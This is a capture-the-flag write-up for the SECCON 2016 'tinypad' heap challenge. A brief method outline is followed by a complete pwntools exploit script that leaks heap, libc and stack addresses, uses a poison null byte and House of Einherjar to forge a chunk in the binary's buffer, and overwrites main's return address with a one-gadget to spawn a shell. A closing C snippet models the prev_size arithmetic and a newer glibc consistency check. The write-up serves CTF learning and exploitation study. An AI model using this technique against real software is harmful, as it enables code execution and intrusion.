2016-Seccon-tinypad

This is a House of Einherjar challenge.

[Exploit method]

Leak a heap address and the libc address.

Edits use strlen() to determine how many characters are in the chunk before reading input.

Fill the heap with junk right up to the next chunk's size field (poison null byte).

Use House of Einherjar.

Set prev_size to (address of the allocated chunk - 0x10 - the target address to allocate at) and clear prev_inuse to 0.

Allocate at the tinypad address.

Leak the stack via the environ address.

Find main's return address slot and write the one-gadget (oneshot) there.

from pwn import *

# Python 2 / pwntools script as on the original page (str-based I/O).
# Menu wrappers for tinypad: (a)dd, (d)elete, (e)dit.
def add(size, content):
    sla('>>>', 'a')
    sla('>>>', str(size))
    sla('>>>', content)

def delete(idx):
    sla('>>>', 'd')
    sla('>>>', str(idx))

def edit(idx, content):
    sla('>>>', 'e')
    sla('>>>', str(idx))
    sla('>>>', content)
    sla('>>>', 'Y')

r = process('./tinypad')
e = ELF('./tinypad')
libc = e.libc

sla = lambda x, y: r.sendlineafter(x, y)
ru = lambda x: r.recvuntil(x)
sa = lambda x, y: r.sendafter(x, y)

# --- Stage 1: heap and libc leaks ---
# Two fastbin-sized chunks (0x80) and one unsorted-bin-sized chunk (0x110).
add(0x70, 'A'*8)   # 1
add(0x70, 'B'*8)   # 2
add(0x100, 'B'*8)  # 3

# Free 2 then 1: chunk 1's fastbin fd now points at chunk 2 (heap base + 0x80).
# tinypad still lists the freed chunk's content, which leaks that fd pointer.
delete(2)
delete(1)

ru('CONTENT: ')
heap_leak = u64(ru('\n').replace('\n', '').ljust(8, '\x00')) - 0x80
log.info('Heap : ' + hex(heap_leak))

# Free 3: it goes to the unsorted bin, so its fd/bk point into main_arena.
delete(3)

ru('#   INDEX: 1')
ru('CONTENT: ')
main_arena = u64(ru('\x7f').ljust(8, '\x00'))
log.info('Main_arena : ' + hex(main_arena))
libc_leak = main_arena - 0x3c4b78   # offset for the author's libc build
log.info('Libc : ' + hex(libc_leak))
environ = libc_leak + libc.symbols['environ']
log.info('Environ : ' + hex(environ))
oneshot = libc_leak + 0xf1147       # one-gadget offset for the same libc
log.info('Oneshot : ' + hex(oneshot))

# --- Stage 2: poison null byte + House of Einherjar ---
# Chunk 1 (0x20) sits directly before chunk 2 (0x110). The terminator written
# after 0x18 bytes lands on chunk 2's size byte (0x111 -> 0x100, prev_inuse
# cleared). The trailing '\x11' in chunk 2 gives the shrunken chunk a small,
# valid-looking "next chunk" size so free() accepts it.
add(0x18, 'A'*0x18)            # 1
add(0x100, 'B'*0xf8 + '\x11')  # 2
add(0x100, 'C'*0xf8)           # 3
add(0x100, 'D'*0xf8)           # 4

'''
heap+0x10:      0x41414141      0x41414141      0x41414141      0x41414141
heap+0x20:      0x41414141      0x41414141      0x00000111      0x00000000
'''

# The fake chunk lives in tinypad's edit buffer at tinypad+0x20.
# prev_size is chosen so that chunk2_header - prev_size == tinypad+0x20.
tinypad = 0x602040
fake_prev_size = heap_leak + 0x30 - 0x10 - (tinypad + 0x20)
log.info('Fake_prev_size : ' + hex(fake_prev_size))

# Fake chunk: prev_size 0, size 0x101, fd/bk pointing at itself (unlink check).
fake_chunk = 'D'*0x20 + p64(0) + p64(0x101) + p64(tinypad + 0x20)*2

# edit() reads as many bytes as strlen() of the current content, so the size
# field is rewritten by shrinking the string step by step and letting the
# terminator zero the trailing bytes, until prev_size can be written.
edit(1, 'A'*0x18 + 'f\x01')
edit(1, 'A'*0x18)

for i in range(3, -1, -1):
    edit(1, 'A'*0x14 + 'f'*i)

edit(1, 'A'*0x10 + p64(fake_prev_size))
edit(3, fake_chunk)   # stage the fake chunk in the tinypad buffer

# free(2): prev_inuse is clear, so it consolidates backward into the fake chunk.
delete(2)

'''
size_error
0x602060 <tinypad+32>:  0x00000000      0x00000000      0x0072d0c1      0x00000000
0x602070 <tinypad+48>:  0x4f540b78      0x00007f24      0x4f540b78      0x00007f24
'''

# The merged chunk carries the huge size; repair it to 0x101 and point fd/bk
# back at the unsorted bin so the next malloc(0xf8) returns tinypad+0x30.
change_size = 'A'*0x20 + p64(0) + p64(0x101) + p64(main_arena)*2
edit(4, change_size)

# --- Stage 3: overwrite tinypad's entries, leak the stack, write the ret ---
# The new chunk overlaps tinypad's index table: entry 1's pointer becomes
# 0x602150 (entry 2's slot) and entry 2's pointer becomes environ.
add(0xf8, 'A'*0xd8 + p64(0x602150) + 'A'*8 + p64(environ))
ru('#   INDEX: 2')
ru('CONTENT: ')
stack = u64(ru('\x7f').ljust(8, '\x00'))
ret = stack - 240   # distance from environ to main's saved return address

log.info('Stack : ' + hex(stack))
log.info('Ret : ' + hex(ret))

# Through entry 1, redirect entry 2 to main's return address, then write the one-gadget.
edit(1, 'A'*8 + p64(ret))
edit(2, p64(oneshot))

# Quit so main returns into the one-gadget.
sla('>>>', 'q')

r.interactive()
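The prev_size arithmetic from the method above and the script's fake_prev_size, modelled in C as an added example (not part of the original writeup): it computes where backward consolidation lands and applies the size-vs-prev_size consistency check that newer glibc performs in _int_free. 0x602040 is the page's tinypad address; the heap base 0x603000 is a constructed value.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Minimal model of a glibc malloc chunk header (x86-64): prev_size, size. */
#define SIZE_BITS  0x7ULL
#define PREV_INUSE 0x1ULL

typedef struct {
    uint64_t prev_size;   /* meaningful only when PREV_INUSE of `size` is clear */
    uint64_t size;        /* chunk size with flag bits in the low 3 bits */
} chunk_hdr;

static uint64_t chunksize(uint64_t size_field) { return size_field & ~SIZE_BITS; }

/* The page's formula (script: fake_prev_size): a prev_size that makes
   header - prev_size land on `target`; user_ptr - 0x10 is the chunk header. */
uint64_t forged_prev_size(uint64_t user_ptr, uint64_t target) {
    return user_ptr - 0x10 - target;
}

/* Where free() would consolidate backward to (chunk_at_offset(p, -prev_size)),
   or 0 when PREV_INUSE is set and no backward merge happens at all. */
uint64_t consolidate_target(uint64_t chunk_addr, chunk_hdr hdr) {
    if (hdr.size & PREV_INUSE) return 0;
    return chunk_addr - hdr.prev_size;
}

/* Consistency check newer glibc applies before merging: the previous chunk's
   own size field must equal the prev_size recorded in the chunk being freed
   (otherwise "corrupted size vs. prev_size while consolidating"). */
bool consolidation_passes(chunk_hdr freed, uint64_t prev_chunk_size_field) {
    return chunksize(prev_chunk_size_field) == freed.prev_size;
}

int main(void) {
    const uint64_t tinypad = 0x602040ULL;      /* from the page */
    const uint64_t heap = 0x603000ULL;         /* constructed heap base */
    const uint64_t chunk2_user = heap + 0x30;  /* script's heap_leak + 0x30 */
    uint64_t ps = forged_prev_size(chunk2_user, tinypad + 0x20);
    chunk_hdr chunk2 = { ps, 0x100 };          /* size byte poisoned: 0x111 -> 0x100 */

    printf("forged prev_size    : 0x%llx\n", (unsigned long long)ps);
    printf("consolidates into   : 0x%llx\n",
           (unsigned long long)consolidate_target(chunk2_user - 0x10, chunk2));
    /* fake chunk size 0x101 vs prev_size 0xfc0: the consistency check rejects it */
    printf("size vs prev_size ok: %s\n", consolidation_passes(chunk2, 0x101) ? "yes" : "no");
    return 0;
}
```

The check only enforces agreement between the fake chunk's size field and the recorded prev_size, so it is a consistency check rather than a complete defence against forged chunks.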